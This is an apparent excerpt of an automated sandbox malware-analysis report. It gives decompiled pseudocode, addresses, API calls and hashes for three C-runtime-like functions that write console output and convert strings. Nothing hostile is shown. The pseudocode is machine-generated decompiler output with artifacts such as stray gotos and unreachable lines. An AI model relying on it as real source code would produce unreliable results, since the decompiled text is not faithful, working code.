                                                                                      				intOrPtr _v108;
                                                                                      				char _v112;
                                                                                      				int _v116;
                                                                                      				struct _OVERLAPPED* _v120;
                                                                                      				struct _OVERLAPPED* _v124;
                                                                                      				struct _OVERLAPPED* _v128;
                                                                                      				struct _OVERLAPPED* _v132;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t177;
                                                                                      				signed int _t178;
                                                                                      				signed int _t180;
                                                                                      				int _t186;
                                                                                      				signed char* _t190;
                                                                                      				signed char _t195;
                                                                                      				intOrPtr _t198;
                                                                                      				void* _t200;
                                                                                      				signed char* _t201;
                                                                                      				long _t205;
                                                                                      				intOrPtr _t210;
                                                                                      				void _t212;
                                                                                      				signed char* _t217;
                                                                                      				void* _t224;
                                                                                      				char _t227;
                                                                                      				struct _OVERLAPPED* _t229;
                                                                                      				void* _t238;
                                                                                      				signed int _t240;
                                                                                      				signed char* _t243;
                                                                                      				long _t246;
                                                                                      				intOrPtr _t247;
                                                                                      				signed char* _t248;
                                                                                      				void* _t258;
                                                                                      				intOrPtr _t265;
                                                                                      				void* _t266;
                                                                                      				struct _OVERLAPPED* _t267;
                                                                                      				signed int _t268;
                                                                                      				signed int _t273;
                                                                                      				intOrPtr* _t279;
                                                                                      				signed int _t281;
                                                                                      				signed int _t285;
                                                                                      				signed char _t286;
                                                                                      				long _t287;
                                                                                      				signed int _t291;
                                                                                      				signed char* _t292;
                                                                                      				struct _OVERLAPPED* _t296;
                                                                                      				void* _t299;
                                                                                      				signed int _t300;
                                                                                      				signed int _t302;
                                                                                      				struct _OVERLAPPED* _t303;
                                                                                      				signed char* _t306;
                                                                                      				intOrPtr* _t307;
                                                                                      				void* _t308;
                                                                                      				signed int _t309;
                                                                                      				long _t310;
                                                                                      				signed int _t311;
                                                                                      				signed int _t312;
                                                                                      				signed int _t313;
                                                                                      				void* _t314;
                                                                                      				void* _t315;
                                                                                      				void* _t316;
                                                                                      
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x432780);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t315 = _t314 - 0x74;
                                                                                      				_t177 =  *0x443048; // 0x9900ec21
                                                                                      				_t178 = _t177 ^ _t313;
                                                                                      				_v20 = _t178;
                                                                                      				_push(_t178);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_t180 = _a8;
                                                                                      				_t306 = _a12;
                                                                                      				_t265 = _a20;
                                                                                      				_t268 = (_t180 & 0x0000003f) * 0x38;
                                                                                      				_t291 = _t180 >> 6;
                                                                                      				_v100 = _t306;
                                                                                      				_v64 = _t265;
                                                                                      				_v84 = _t291;
                                                                                      				_v72 = _t268;
                                                                                      				_v104 =  *((intOrPtr*)( *((intOrPtr*)(0x444b30 + _t291 * 4)) + _t268 + 0x18));
                                                                                      				_v88 = _a16 + _t306;
                                                                                      				_t186 = GetConsoleOutputCP();
                                                                                      				_t317 =  *((char*)(_t265 + 0x14));
                                                                                      				_v116 = _t186;
                                                                                      				if( *((char*)(_t265 + 0x14)) == 0) {
                                                                                      					E0041A250(_t265, _t291, _t317);
                                                                                      				}
                                                                                      				_t307 = _a4;
                                                                                      				_v108 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0xc)) + 8));
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				_t190 = _v100;
                                                                                      				_t292 = _t190;
                                                                                      				_v52 = _t292;
                                                                                      				if(_t190 < _v88) {
                                                                                      					_t300 = _v72;
                                                                                      					_t267 = 0;
                                                                                      					_v76 = 0;
                                                                                      					do {
                                                                                      						_v53 =  *_t292;
                                                                                      						_v68 = _t267;
                                                                                      						_v48 = 1;
                                                                                      						_t273 =  *(0x444b30 + _v84 * 4);
                                                                                      						_v80 = _t273;
                                                                                      						if(_v108 != 0xfde9) {
                                                                                      							_t195 =  *((intOrPtr*)(_t300 + _t273 + 0x2d));
                                                                                      							__eflags = _t195 & 0x00000004;
                                                                                      							if((_t195 & 0x00000004) == 0) {
                                                                                      								_t273 =  *_t292 & 0x000000ff;
                                                                                      								_t198 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
                                                                                      								__eflags =  *((intOrPtr*)(_t198 + _t273 * 2)) - _t267;
                                                                                      								if( *((intOrPtr*)(_t198 + _t273 * 2)) >= _t267) {
                                                                                      									_push(_v64);
                                                                                      									_push(1);
                                                                                      									_push(_t292);
                                                                                      									goto L29;
                                                                                      								} else {
                                                                                      									_t217 =  &(_t292[1]);
                                                                                      									_v60 = _t217;
                                                                                      									__eflags = _t217 - _v88;
                                                                                      									if(_t217 >= _v88) {
                                                                                      										 *((char*)(_t300 + _v80 + 0x2e)) =  *_t292;
                                                                                      										 *( *(0x444b30 + _v84 * 4) + _t300 + 0x2d) =  *( *(0x444b30 + _v84 * 4) + _t300 + 0x2d) | 0x00000004;
                                                                                      										 *((intOrPtr*)(_t307 + 4)) = _v76 + 1;
                                                                                      									} else {
                                                                                      										_t224 = E00422AF7(_t273, _t292,  &_v68, _t292, 2, _v64);
                                                                                      										_t316 = _t315 + 0x10;
                                                                                      										__eflags = _t224 - 0xffffffff;
                                                                                      										if(_t224 != 0xffffffff) {
                                                                                      											_t201 = _v60;
                                                                                      											goto L31;
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_push(_v64);
                                                                                      								_v36 =  *(_t300 + _t273 + 0x2e) & 0x000000fb;
                                                                                      								_t227 =  *_t292;
                                                                                      								_v35 = _t227;
                                                                                      								 *((char*)(_t300 + _t273 + 0x2d)) = _t227;
                                                                                      								_push(2);
                                                                                      								_push( &_v36);
                                                                                      								L29:
                                                                                      								_push( &_v68);
                                                                                      								_t200 = E00422AF7(_t273, _t292);
                                                                                      								_t316 = _t315 + 0x10;
                                                                                      								__eflags = _t200 - 0xffffffff;
                                                                                      								if(_t200 != 0xffffffff) {
                                                                                      									_t201 = _v52;
                                                                                      									goto L31;
                                                                                      								}
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t229 = _t267;
                                                                                      							_t279 = _t273 + 0x2e + _t300;
                                                                                      							while( *_t279 != _t267) {
                                                                                      								_t229 =  &(_t229->Internal);
                                                                                      								_t279 = _t279 + 1;
                                                                                      								if(_t229 < 5) {
                                                                                      									continue;
                                                                                      								}
                                                                                      								break;
                                                                                      							}
                                                                                      							_t302 = _v88 - _t292;
                                                                                      							_v48 = _t229;
                                                                                      							if(_t229 == 0) {
                                                                                      								_t73 = ( *_t292 & 0x000000ff) + 0x4432d0; // 0x0
                                                                                      								_t281 =  *_t73 + 1;
                                                                                      								_v80 = _t281;
                                                                                      								__eflags = _t281 - _t302;
                                                                                      								if(_t281 > _t302) {
                                                                                      									__eflags = _t302;
                                                                                      									if(_t302 <= 0) {
                                                                                      										goto L44;
                                                                                      									} else {
                                                                                      										_t309 = _v72;
                                                                                      										do {
                                                                                      											 *((char*)( *(0x444b30 + _v84 * 4) + _t309 + _t267 + 0x2e)) =  *((intOrPtr*)(_t267 + _t292));
                                                                                      											_t267 =  &(_t267->Internal);
                                                                                      											__eflags = _t267 - _t302;
                                                                                      										} while (_t267 < _t302);
                                                                                      										goto L43;
                                                                                      									}
                                                                                      									L52:
                                                                                      								} else {
                                                                                      									_v132 = _t267;
                                                                                      									__eflags = _t281 - 4;
                                                                                      									_v128 = _t267;
                                                                                      									_v60 = _t292;
                                                                                      									_v48 = (_t281 == 4) + 1;
                                                                                      									_t238 = E0042C34C( &_v132,  &_v68,  &_v60, (_t281 == 4) + 1,  &_v132, _v64);
                                                                                      									_t316 = _t315 + 0x14;
                                                                                      									__eflags = _t238 - 0xffffffff;
                                                                                      									if(_t238 != 0xffffffff) {
                                                                                      										_t240 =  &(_v52[_v80]);
                                                                                      										__eflags = _t240;
                                                                                      										_t300 = _v72;
                                                                                      										goto L21;
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t285 = _v72;
                                                                                      								_t243 = _v80 + 0x2e + _t285;
                                                                                      								_v80 = _t243;
                                                                                      								_t246 =  *((char*)(( *_t243 & 0x000000ff) + 0x4432d0)) + 1;
                                                                                      								_v60 = _t246;
                                                                                      								_t247 = _t246 - _v48;
                                                                                      								_v76 = _t247;
                                                                                      								if(_t247 > _t302) {
                                                                                      									__eflags = _t302;
                                                                                      									if(_t302 > 0) {
                                                                                      										_t248 = _v52;
                                                                                      										_t310 = _v48;
                                                                                      										do {
                                                                                      											_t286 =  *((intOrPtr*)(_t267 + _t248));
                                                                                      											_t292 =  *(0x444b30 + _v84 * 4) + _t285 + _t267;
                                                                                      											_t267 =  &(_t267->Internal);
                                                                                      											_t292[_t310 + 0x2e] = _t286;
                                                                                      											_t285 = _v72;
                                                                                      											__eflags = _t267 - _t302;
                                                                                      										} while (_t267 < _t302);
                                                                                      										L43:
                                                                                      										_t307 = _a4;
                                                                                      									}
                                                                                      									L44:
                                                                                      									 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + _t302;
                                                                                      								} else {
                                                                                      									_t287 = _v48;
                                                                                      									_t303 = _t267;
                                                                                      									_t311 = _v80;
                                                                                      									do {
                                                                                      										 *((char*)(_t313 + _t303 - 0x18)) =  *_t311;
                                                                                      										_t303 =  &(_t303->Internal);
                                                                                      										_t311 = _t311 + 1;
                                                                                      									} while (_t303 < _t287);
                                                                                      									_t304 = _v76;
                                                                                      									if(_v76 > 0) {
                                                                                      										E00414BF0( &_v28 + _t287, _t292, _t304);
                                                                                      										_t287 = _v48;
                                                                                      										_t315 = _t315 + 0xc;
                                                                                      									}
                                                                                      									_t300 = _v72;
                                                                                      									_t296 = _t267;
                                                                                      									_t312 = _v84;
                                                                                      									do {
                                                                                      										 *( *((intOrPtr*)(0x444b30 + _t312 * 4)) + _t300 + _t296 + 0x2e) = _t267;
                                                                                      										_t296 =  &(_t296->Internal);
                                                                                      									} while (_t296 < _t287);
                                                                                      									_t307 = _a4;
                                                                                      									_v112 =  &_v28;
                                                                                      									_v124 = _t267;
                                                                                      									_v120 = _t267;
                                                                                      									_v48 = (_v60 == 4) + 1;
                                                                                      									_t258 = E0042C34C( &_v124,  &_v68,  &_v112, (_v60 == 4) + 1,  &_v124, _v64);
                                                                                      									_t316 = _t315 + 0x14;
                                                                                      									if(_t258 != 0xffffffff) {
                                                                                      										_t240 =  &(_v52[_v76]);
                                                                                      										L21:
                                                                                      										_t201 = _t240 - 1;
                                                                                      										L31:
                                                                                      										_v52 = _t201 + 1;
                                                                                      										_t205 = E00427D31(_v116, _t267,  &_v68, _v48,  &_v44, 5, _t267, _t267);
                                                                                      										_t315 = _t316 + 0x20;
                                                                                      										_v60 = _t205;
                                                                                      										if(_t205 != 0) {
                                                                                      											if(WriteFile(_v104,  &_v44, _t205,  &_v96, _t267) == 0) {
                                                                                      												L50:
                                                                                      												 *_t307 = GetLastError();
                                                                                      											} else {
                                                                                      												_t292 = _v52;
                                                                                      												_t210 =  *((intOrPtr*)(_t307 + 8)) + _t292 - _v100;
                                                                                      												_v76 = _t210;
                                                                                      												 *((intOrPtr*)(_t307 + 4)) = _t210;
                                                                                      												if(_v96 >= _v60) {
                                                                                      													if(_v53 != 0xa) {
                                                                                      														goto L38;
                                                                                      													} else {
                                                                                      														_t212 = 0xd;
                                                                                      														_v92 = _t212;
                                                                                      														if(WriteFile(_v104,  &_v92, 1,  &_v96, _t267) == 0) {
                                                                                      															goto L50;
                                                                                      														} else {
                                                                                      															if(_v96 >= 1) {
                                                                                      																 *((intOrPtr*)(_t307 + 8)) =  *((intOrPtr*)(_t307 + 8)) + 1;
                                                                                      																 *((intOrPtr*)(_t307 + 4)) =  *((intOrPtr*)(_t307 + 4)) + 1;
                                                                                      																_t292 = _v52;
                                                                                      																_v76 =  *((intOrPtr*)(_t307 + 4));
                                                                                      																goto L38;
                                                                                      															}
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						goto L51;
                                                                                      						L38:
                                                                                      					} while (_t292 < _v88);
                                                                                      				}
                                                                                      				L51:
                                                                                      				 *[fs:0x0] = _v16;
                                                                                      				_pop(_t299);
                                                                                      				_pop(_t308);
                                                                                      				_pop(_t266);
                                                                                      				return E0041361E(_t307, _t266, _v20 ^ _t313, _t292, _t299, _t308);
                                                                                      				goto L52;
                                                                                      			}





















































































                                                                                      0x00420e6d
                                                                                      0x00420e6f
                                                                                      0x00420e7a
                                                                                      0x00420e7b
                                                                                      0x00420e7e
                                                                                      0x00420e83
                                                                                      0x00420e85
                                                                                      0x00420e8b
                                                                                      0x00420e8f
                                                                                      0x00420e95
                                                                                      0x00420e9a
                                                                                      0x00420ea0
                                                                                      0x00420ea3
                                                                                      0x00420ea6
                                                                                      0x00420ea9
                                                                                      0x00420eac
                                                                                      0x00420eaf
                                                                                      0x00420eb9
                                                                                      0x00420ec0
                                                                                      0x00420ec8
                                                                                      0x00420ecb
                                                                                      0x00420ed1
                                                                                      0x00420ed5
                                                                                      0x00420ed8
                                                                                      0x00420edc
                                                                                      0x00420edc
                                                                                      0x00420ee4
                                                                                      0x00420eec
                                                                                      0x00420ef1
                                                                                      0x00420ef2
                                                                                      0x00420ef3
                                                                                      0x00420ef4
                                                                                      0x00420ef7
                                                                                      0x00420ef9
                                                                                      0x00420eff
                                                                                      0x00420f05
                                                                                      0x00420f08
                                                                                      0x00420f0a
                                                                                      0x00420f0d
                                                                                      0x00420f16
                                                                                      0x00420f1c
                                                                                      0x00420f1f
                                                                                      0x00420f26
                                                                                      0x00420f2d
                                                                                      0x00420f30
                                                                                      0x0042106a
                                                                                      0x0042106e
                                                                                      0x00421071
                                                                                      0x00421094
                                                                                      0x0042109a
                                                                                      0x0042109c
                                                                                      0x004210a0
                                                                                      0x004210d1
                                                                                      0x004210d4
                                                                                      0x004210d6
                                                                                      0x00000000
                                                                                      0x004210a2
                                                                                      0x004210a2
                                                                                      0x004210a5
                                                                                      0x004210a8
                                                                                      0x004210ab
                                                                                      0x004211f5
                                                                                      0x00421203
                                                                                      0x0042120c
                                                                                      0x004210b1
                                                                                      0x004210bb
                                                                                      0x004210c0
                                                                                      0x004210c3
                                                                                      0x004210c6
                                                                                      0x004210cc
                                                                                      0x00000000
                                                                                      0x004210cc
                                                                                      0x004210c6
                                                                                      0x004210ab
                                                                                      0x00421073
                                                                                      0x0042107a
                                                                                      0x0042107d
                                                                                      0x00421080
                                                                                      0x00421082
                                                                                      0x00421085
                                                                                      0x0042108c
                                                                                      0x0042108e
                                                                                      0x004210d7
                                                                                      0x004210da
                                                                                      0x004210db
                                                                                      0x004210e0
                                                                                      0x004210e3
                                                                                      0x004210e6
                                                                                      0x004210ec
                                                                                      0x00000000
                                                                                      0x004210ec
                                                                                      0x004210e6
                                                                                      0x00420f36
                                                                                      0x00420f39
                                                                                      0x00420f3b
                                                                                      0x00420f3d
                                                                                      0x00420f41
                                                                                      0x00420f42
                                                                                      0x00420f46
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00420f46
                                                                                      0x00420f4b
                                                                                      0x00420f4d
                                                                                      0x00420f52
                                                                                      0x00421012
                                                                                      0x00421019
                                                                                      0x0042101a
                                                                                      0x0042101d
                                                                                      0x0042101f
                                                                                      0x004211cf
                                                                                      0x004211d1
                                                                                      0x00000000
                                                                                      0x004211d3
                                                                                      0x004211d3
                                                                                      0x004211d6
                                                                                      0x004211e5
                                                                                      0x004211e9
                                                                                      0x004211ea
                                                                                      0x004211ea
                                                                                      0x00000000
                                                                                      0x004211ee
                                                                                      0x00000000
                                                                                      0x00421025
                                                                                      0x0042102a
                                                                                      0x0042102d
                                                                                      0x00421030
                                                                                      0x00421036
                                                                                      0x0042103f
                                                                                      0x0042104a
                                                                                      0x0042104f
                                                                                      0x00421052
                                                                                      0x00421055
                                                                                      0x0042105e
                                                                                      0x0042105e
                                                                                      0x00421061
                                                                                      0x00000000
                                                                                      0x00421061
                                                                                      0x00421055
                                                                                      0x00420f58
                                                                                      0x00420f5b
                                                                                      0x00420f61
                                                                                      0x00420f63
                                                                                      0x00420f70
                                                                                      0x00420f71
                                                                                      0x00420f74
                                                                                      0x00420f77
                                                                                      0x00420f7c
                                                                                      0x004211a0
                                                                                      0x004211a2
                                                                                      0x004211a4
                                                                                      0x004211a7
                                                                                      0x004211aa
                                                                                      0x004211b6
                                                                                      0x004211b9
                                                                                      0x004211bb
                                                                                      0x004211bc
                                                                                      0x004211c0
                                                                                      0x004211c3
                                                                                      0x004211c3
                                                                                      0x004211c7
                                                                                      0x004211c7
                                                                                      0x004211c7
                                                                                      0x004211ca
                                                                                      0x004211ca
                                                                                      0x00420f82
                                                                                      0x00420f82
                                                                                      0x00420f85
                                                                                      0x00420f87
                                                                                      0x00420f8a
                                                                                      0x00420f8c
                                                                                      0x00420f90
                                                                                      0x00420f91
                                                                                      0x00420f92
                                                                                      0x00420f96
                                                                                      0x00420f9b
                                                                                      0x00420fa5
                                                                                      0x00420faa
                                                                                      0x00420fad
                                                                                      0x00420fad
                                                                                      0x00420fb0
                                                                                      0x00420fb3
                                                                                      0x00420fb5
                                                                                      0x00420fb8
                                                                                      0x00420fc1
                                                                                      0x00420fc5
                                                                                      0x00420fc6
                                                                                      0x00420fcd
                                                                                      0x00420fd3
                                                                                      0x00420fdb
                                                                                      0x00420fe6
                                                                                      0x00420feb
                                                                                      0x00420ff6
                                                                                      0x00420ffb
                                                                                      0x00421001
                                                                                      0x0042100a
                                                                                      0x00421064
                                                                                      0x00421064
                                                                                      0x004210ef
                                                                                      0x004210f4
                                                                                      0x00421106
                                                                                      0x0042110b
                                                                                      0x0042110e
                                                                                      0x00421113
                                                                                      0x0042112e
                                                                                      0x00421211
                                                                                      0x00421217
                                                                                      0x00421134
                                                                                      0x00421134
                                                                                      0x0042113f
                                                                                      0x00421141
                                                                                      0x00421144
                                                                                      0x0042114d
                                                                                      0x00421157
                                                                                      0x00000000
                                                                                      0x00421159
                                                                                      0x0042115b
                                                                                      0x0042115d
                                                                                      0x00421176
                                                                                      0x00000000
                                                                                      0x0042117c
                                                                                      0x00421180
                                                                                      0x00421186
                                                                                      0x00421189
                                                                                      0x0042118f
                                                                                      0x00421192
                                                                                      0x00000000
                                                                                      0x00421192
                                                                                      0x00421180
                                                                                      0x00421176
                                                                                      0x00421157
                                                                                      0x0042114d
                                                                                      0x0042112e
                                                                                      0x00421113
                                                                                      0x00421001
                                                                                      0x00420f7c
                                                                                      0x00420f52
                                                                                      0x00000000
                                                                                      0x00421195
                                                                                      0x00421195
                                                                                      0x0042119e
                                                                                      0x00421219
                                                                                      0x0042121e
                                                                                      0x00421226
                                                                                      0x00421227
                                                                                      0x00421228
                                                                                      0x00421234
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetConsoleOutputCP.KERNEL32(9900EC21,00000000,00000000,00000000), ref: 00420ECB
                                                                                        • Part of subcall function 00427D31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004264E6,?,00000000,-00000008), ref: 00427DDD
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00421126
                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0042116E
                                                                                      • GetLastError.KERNEL32 ref: 00421211
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                      • String ID:
                                                                                      • API String ID: 2112829910-0
                                                                                      • Opcode ID: eb595d93af68cd048b5a833341e3e94e68673d962d339c70a0039101d20391f5
                                                                                      • Instruction ID: ac4cfe10a7d27ed62ff7de5ddb6cd96f2af41a5dc5bcf9134081d331438b7029
                                                                                      • Opcode Fuzzy Hash: eb595d93af68cd048b5a833341e3e94e68673d962d339c70a0039101d20391f5
                                                                                      • Instruction Fuzzy Hash: 69D19975E002689FCF15CFE8E880AADBBB4FF49304F58416AE815E7352D734A942CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0042814D(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
                                                                                      				intOrPtr _t17;
                                                                                      				intOrPtr _t18;
                                                                                      				intOrPtr _t20;
                                                                                      				intOrPtr _t30;
                                                                                      				char _t32;
                                                                                      				intOrPtr _t40;
                                                                                      				intOrPtr* _t42;
                                                                                      				intOrPtr _t43;
                                                                                      
                                                                                      				_t42 = _a4;
                                                                                      				if(_t42 != 0) {
                                                                                      					_t32 = 0;
                                                                                      					__eflags =  *_t42;
                                                                                      					if( *_t42 != 0) {
                                                                                      						_t17 = E00427D31(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
                                                                                      						__eflags = _t17;
                                                                                      						if(_t17 != 0) {
                                                                                      							_t40 = _a8;
                                                                                      							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
                                                                                      							if(__eflags <= 0) {
                                                                                      								L11:
                                                                                      								_t18 = E0041D3BA(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
                                                                                      								__eflags = _t18;
                                                                                      								if(_t18 != 0) {
                                                                                      									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
                                                                                      									_t20 = 0;
                                                                                      									__eflags = 0;
                                                                                      								} else {
                                                                                      									E0041C9F9(GetLastError());
                                                                                      									_t20 =  *((intOrPtr*)(E0041CA53()));
                                                                                      								}
                                                                                      								L14:
                                                                                      								return _t20;
                                                                                      							}
                                                                                      							_t20 = E004286EF(_t40, __eflags, _t17);
                                                                                      							__eflags = _t20;
                                                                                      							if(_t20 != 0) {
                                                                                      								goto L14;
                                                                                      							}
                                                                                      							goto L11;
                                                                                      						}
                                                                                      						E0041C9F9(GetLastError());
                                                                                      						return  *((intOrPtr*)(E0041CA53()));
                                                                                      					}
                                                                                      					_t43 = _a8;
                                                                                      					__eflags =  *((intOrPtr*)(_t43 + 0xc));
                                                                                      					if(__eflags != 0) {
                                                                                      						L6:
                                                                                      						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
                                                                                      						L2:
                                                                                      						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
                                                                                      						return 0;
                                                                                      					}
                                                                                      					_t30 = E004286EF(_t43, __eflags, 1);
                                                                                      					__eflags = _t30;
                                                                                      					if(_t30 != 0) {
                                                                                      						return _t30;
                                                                                      					}
                                                                                      					goto L6;
                                                                                      				}
                                                                                      				_t43 = _a8;
                                                                                      				E0041D3DE(_t43);
                                                                                      				_t32 = 0;
                                                                                      				 *((intOrPtr*)(_t43 + 8)) = 0;
                                                                                      				 *((intOrPtr*)(_t43 + 0xc)) = 0;
                                                                                      				goto L2;
                                                                                      			}











                                                                                      0x00428154
                                                                                      0x00428159
                                                                                      0x00428177
                                                                                      0x00428179
                                                                                      0x0042817c
                                                                                      0x004281a5
                                                                                      0x004281ad
                                                                                      0x004281af
                                                                                      0x004281c8
                                                                                      0x004281cb
                                                                                      0x004281ce
                                                                                      0x004281dc
                                                                                      0x004281e9
                                                                                      0x004281ee
                                                                                      0x004281f0
                                                                                      0x00428209
                                                                                      0x0042820c
                                                                                      0x0042820c
                                                                                      0x004281f2
                                                                                      0x004281f9
                                                                                      0x00428204
                                                                                      0x00428204
                                                                                      0x0042820e
                                                                                      0x00000000
                                                                                      0x0042820e
                                                                                      0x004281d3
                                                                                      0x004281d8
                                                                                      0x004281da
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004281da
                                                                                      0x004281b8
                                                                                      0x00000000
                                                                                      0x004281c3
                                                                                      0x0042817e
                                                                                      0x00428181
                                                                                      0x00428184
                                                                                      0x00428193
                                                                                      0x00428196
                                                                                      0x0042816d
                                                                                      0x0042816d
                                                                                      0x00000000
                                                                                      0x00428170
                                                                                      0x0042818a
                                                                                      0x0042818f
                                                                                      0x00428191
                                                                                      0x00428212
                                                                                      0x00428212
                                                                                      0x00000000
                                                                                      0x00428191
                                                                                      0x0042815b
                                                                                      0x00428160
                                                                                      0x00428165
                                                                                      0x00428167
                                                                                      0x0042816a
                                                                                      0x00000000

                                                                                      APIs
                                                                                        • Part of subcall function 00427D31: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,004264E6,?,00000000,-00000008), ref: 00427DDD
                                                                                      • GetLastError.KERNEL32 ref: 004281B1
                                                                                      • __dosmaperr.LIBCMT ref: 004281B8
                                                                                      • GetLastError.KERNEL32(?,?,?,?), ref: 004281F2
                                                                                      • __dosmaperr.LIBCMT ref: 004281F9
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1913693674-0
                                                                                      • Opcode ID: 92193438e69e4416bd4c92fd64385e6247f7db12395fc2a69cb738ac0504b02b
                                                                                      • Instruction ID: d132d1f158b9c44ea61a86f1543b5f475bcbec393d0dc6344fa18f1be3475fee
                                                                                      • Opcode Fuzzy Hash: 92193438e69e4416bd4c92fd64385e6247f7db12395fc2a69cb738ac0504b02b
                                                                                      • Instruction Fuzzy Hash: 6721FB71701625AF9B10AF66EC80D6F77A9FF10354740855FF82993690DF38EC5187A8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0041D2DB(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
                                                                                      				void* _t15;
                                                                                      				void* _t16;
                                                                                      				intOrPtr _t18;
                                                                                      				intOrPtr _t38;
                                                                                      				intOrPtr* _t40;
                                                                                      				intOrPtr _t41;
                                                                                      
                                                                                      				_t40 = _a4;
                                                                                      				if(_t40 != 0) {
                                                                                      					if( *_t40 != 0) {
                                                                                      						_t15 = E00427D31(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
                                                                                      						if(_t15 != 0) {
                                                                                      							_t38 = _a8;
                                                                                      							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
                                                                                      								L10:
                                                                                      								_t16 = E0041D3BA(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
                                                                                      								if(_t16 != 0) {
                                                                                      									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
                                                                                      									_t18 = 0;
                                                                                      								} else {
                                                                                      									E0041C9F9(GetLastError());
                                                                                      									_t18 =  *((intOrPtr*)(E0041CA53()));
                                                                                      								}
                                                                                      								L13:
                                                                                      								L14:
                                                                                      								return _t18;
                                                                                      							}
                                                                                      							_t18 = E0041D3F8(_t38, _t15);
                                                                                      							if(_t18 != 0) {
                                                                                      								goto L13;
                                                                                      							}
                                                                                      							goto L10;
                                                                                      						}
                                                                                      						E0041C9F9(GetLastError());
                                                                                      						_t18 =  *((intOrPtr*)(E0041CA53()));
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					_t41 = _a8;
                                                                                      					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
                                                                                      						L5:
                                                                                      						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
                                                                                      						_t18 = 0;
                                                                                      						 *((intOrPtr*)(_t41 + 0x10)) = 0;
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					_t18 = E0041D3F8(_t41, 1);
                                                                                      					if(_t18 != 0) {
                                                                                      						goto L14;
                                                                                      					}
                                                                                      					goto L5;
                                                                                      				}
                                                                                      				E0041D47D(_a8);
                                                                                      				return 0;
                                                                                      			}









                                                                                      0x0041d2e1
                                                                                      0x0041d2e6
                                                                                      0x0041d2fd
                                                                                      0x0041d32f
                                                                                      0x0041d339
                                                                                      0x0041d352
                                                                                      0x0041d358
                                                                                      0x0041d366
                                                                                      0x0041d373
                                                                                      0x0041d37a
                                                                                      0x0041d393
                                                                                      0x0041d396
                                                                                      0x0041d37c
                                                                                      0x0041d383
                                                                                      0x0041d38e
                                                                                      0x0041d38e
                                                                                      0x0041d398
                                                                                      0x0041d399
                                                                                      0x00000000
                                                                                      0x0041d399
                                                                                      0x0041d35d
                                                                                      0x0041d364
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0041d364
                                                                                      0x0041d342
                                                                                      0x0041d34d
                                                                                      0x00000000
                                                                                      0x0041d34d
                                                                                      0x0041d2ff
                                                                                      0x0041d305
                                                                                      0x0041d318
                                                                                      0x0041d31b
                                                                                      0x0041d31d
                                                                                      0x0041d31f
                                                                                      0x00000000
                                                                                      0x0041d31f
                                                                                      0x0041d30b
                                                                                      0x0041d312
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0041d312
                                                                                      0x0041d2eb
                                                                                      0x00000000

                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
